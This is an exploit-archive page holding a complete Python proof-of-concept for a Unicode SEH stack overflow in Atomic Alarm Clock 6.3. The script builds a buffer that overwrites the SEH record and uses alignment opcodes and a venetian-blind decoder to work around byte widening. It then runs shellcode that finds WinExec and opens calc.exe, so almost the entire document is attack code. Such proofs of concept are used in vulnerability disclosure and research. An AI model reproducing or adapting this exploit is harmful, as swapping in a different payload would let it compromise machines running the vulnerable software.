Atomic Alarm Clock 6.3 – Stack Overflow (Unicode+SEH) – Digitalmunition





Atomic Alarm Clock 6.3 – Stack Overflow (Unicode+SEH)

# Exploit Title: Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)
# Exploit Author: Bobby Cooke
# Date: 2020-04-17
# Vendor: Drive Software Company
# Vendor Site: http://www.drive-software.com
# Software Download: http://www.drive-software.com/download/ataclock.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: Atomic Alarm Clock 6.3 beta
# Recreate: Install > Open > Run Exploit > Open poc.txt & copy to clipboard > Time Zones > Clock1 > click 'Enter display name' textbox > paste buffer

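"""
Build the proof-of-concept buffer for the Atomic Alarm Clock 6.3 SEH overflow.

The script only writes ``poc.txt``; delivery is manual (see the "Recreate"
steps in the header: the file content is pasted into the "Enter display name"
textbox).  The vulnerable control widens every byte of the pasted text to a
16-bit code unit, so the payload is written as a classic Unicode exploit:

* every stage interleaves one-byte "alignment" opcodes (``\x72`` add [edx],dh,
  ``\x40`` inc eax, ``\x73`` add [ebx],dh) with the real instructions so the
  inserted 0x00 bytes are consumed at instruction boundaries;
* the 32-byte decoder (``DecoderHex``) is placed with only its odd bytes
  (``firstHalf``); a venetian-blind writer (``venBlinds``) patches the even
  bytes into the 0x00 slots at run time and then ``ret``s into it;
* the window between ``&Payload`` and ``&Decoder`` is 512 *widened* bytes,
  i.e. 256 bytes of source text, hence the ``DECODER_WINDOW // 2`` padding.

All stages are ``bytes`` and the file is opened in binary mode, so no text-mode
newline translation or UTF-8 re-encoding can corrupt the raw opcodes.
"""

File = 'poc.txt'

BUFFER_LEN = 9000        # the PoC always pads the buffer out to exactly this size
DECODER_WINDOW = 512     # widened distance from &Payload to &Decoder (see getDecoder)

# --- SEH record overwrite --------------------------------------------------
os_nSEH = b'\x41' * 461  # junk up to the nSEH field
nSEH    = b'\xeb\x05'    # jmp short +2
SEH     = b'\x47\x47'    # 0x00470047 : pop esi # pop ebx # ret [AtomicAlarmClock.exe]
# {PAGE_EXECUTE_READ} ASLR: False, Rebase: False, SafeSEH: False

# --- stage 1: recover a pointer to the payload -----------------------------
getPC   = b'\x73'   # add [ebx], dh   # nop | [EBX] = writable memory
getPC  += b'\x61'   # popad           # [ESP] = &Payload
getPC  += b'\x72'   # add [edx], dh   # realigns execution for 1 byte opcodes

ebx2eax  = b'\x58'  # pop eax         # EAX = &Payload
ebx2eax += b'\x72'  # add [edx], dh

# Adjust EAX to &Decoder: +0x11001300 - 0x11001100 = +0x200 = 512 widened bytes.
getDecoder  = b'\x05\x13\x11'  # add eax, 0x11001300 # EAX + 512-bytes
getDecoder += b'\x72'          # add [edx], dh
getDecoder += b'\x2D\x11\x11'  # sub eax, 0x11001100 # EAX = &Decoder
getDecoder += b'\x72'          # add [edx], dh
getDecoder += b'\x50'          # push eax            # [ESP] = &Decoder
getDecoder += b'\x72'          # add [edx], dh

# --- stage 2: venetian-blind decoder ----------------------------------------
# The real decoder, as it must look in memory once the blanks are filled in.
DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3'
DECODER = bytes.fromhex(DecoderHex)

# Odd-position bytes survive the widening as-is (each followed by a 0x00).
firstHalf = DECODER[0::2]
# Even-position bytes are what the widening turned into 0x00; venBlinds
# writes them back one at a time.
secondHalf = DECODER[1::2]

# inc eax ; add [edx],dh  -> EAX now points at the first 0x00 slot
venBlinds = b'\x40\x72'
for fill in secondHalf[:-1]:
    # mov byte [eax], fill ; then two "inc eax" (with alignment bytes) to skip
    # over the next surviving byte to the following 0x00 slot.
    venBlinds += b'\xC6' + bytes([fill]) + b'\x72\x40\x72\x40\x72'
# Last slot needs no further advance.
venBlinds += b'\xC6' + secondHalf[-1:] + b'\x72\x40\x72'
# Jump to the decoded decoder by returning to the address getDecoder pushed.
venBlinds += b'\xC3'   #   ret  [!] Now we are executing the decoder!

# --- stage 3: position-independent PopCalc shellcode (no bad characters) ---
fKernel32 = (
    b'\x33\xF6\xF7\xE6\x64\x03\x52\x30\x03\x42\x0C\x03\x70\x1C'
    b'\xAD\x50\x5E\xAD\xFF\x70\x08'
)

gExpotTbl = (
    b'\x33\xC9\x33\xF6\x33\xDB\xF7\xE3\x58\x50\x03\x70\x3C\x03\xF0'
    b'\x03\x56\x78\x03\xD0\x03\x5A\x20\x03\xD8\x03\x4A\x24\x03\xC8'
    b'\x51\x33\xFF\x03\x7A\x1C\x03\xF8\x57'
)

fWinExec = (
    b'\x68\x57\x69\x6E\x45\x33\xC0\x33\xF6\x03\xF4\xFC\x50\x33\xC9'
    b'\x41\x41\x41\x41\xF7\xE1\x33\xFF\x03\x3C\x18\x58\x03\x7C\x24'
    b'\x0C\xF3\xA6\x74\x03\x40\xEB\xE1\x33\xC9\x41\x41\xF7\xE1\x33'
    b'\xC9\x03\x4C\x24\x08\x03\xC8\x33\xC0\x66\x03\x01\x33\xC9\x41'
    b'\x41\x41\x41\xF7\xE1\xFF\x74\x24\x04\x01\x04\x24\x5A\x33\xDB'
    b'\x03\x1A\x03\x5C\x24\x0C'
)

# Call WinExec( CmdLine, ShowState );
#   CmdLine   = "calc.exe"
#   ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
callWinExec = (
    b'\x33\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x33\xC0'
    b'\x03\xC4\x41\x51\x50\xFF\xD3'
)

shellcode = fKernel32 + gExpotTbl + fWinExec + callWinExec


def build_buffer(total_len=BUFFER_LEN):
    """Assemble the full PoC buffer and pad it to *total_len* bytes.

    Returns ``bytes``.  Raises ``ValueError`` if the decoder stages do not fit
    in the 256-source-byte window that getDecoder assumes, or if the payload
    is longer than *total_len* — both would silently misalign the exploit in
    the original script (a negative repeat count just yields no padding).
    """
    stage1 = nSEH + SEH + getPC + ebx2eax + getDecoder + venBlinds
    # getDecoder lands EAX 512 widened bytes past &Payload; after the 2x
    # widening that is DECODER_WINDOW // 2 bytes of source text, so pad
    # stage1 out to exactly that length.
    pad_len = DECODER_WINDOW // 2 - len(stage1)
    if pad_len < 0:
        raise ValueError(
            'decoder stages are %d bytes, exceeding the %d-byte window'
            % (len(stage1), DECODER_WINDOW // 2)
        )
    os_decoder = b'\x90' * pad_len

    buffer = os_nSEH + stage1 + os_decoder + firstHalf + shellcode
    if len(buffer) > total_len:
        raise ValueError(
            'payload is %d bytes, larger than total_len=%d' % (len(buffer), total_len)
        )
    return buffer + b'\x77' * (total_len - len(buffer))


def write_poc(path=File):
    """Write the PoC buffer to *path* in binary mode (no newline translation)."""
    with open(path, 'wb') as fh:
        fh.write(build_buffer())


if __name__ == '__main__':
    try:
        write_poc(File)
    except OSError as exc:
        raise SystemExit(File + ' failed to create: ' + str(exc))
    print(File + " created successfully")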
            
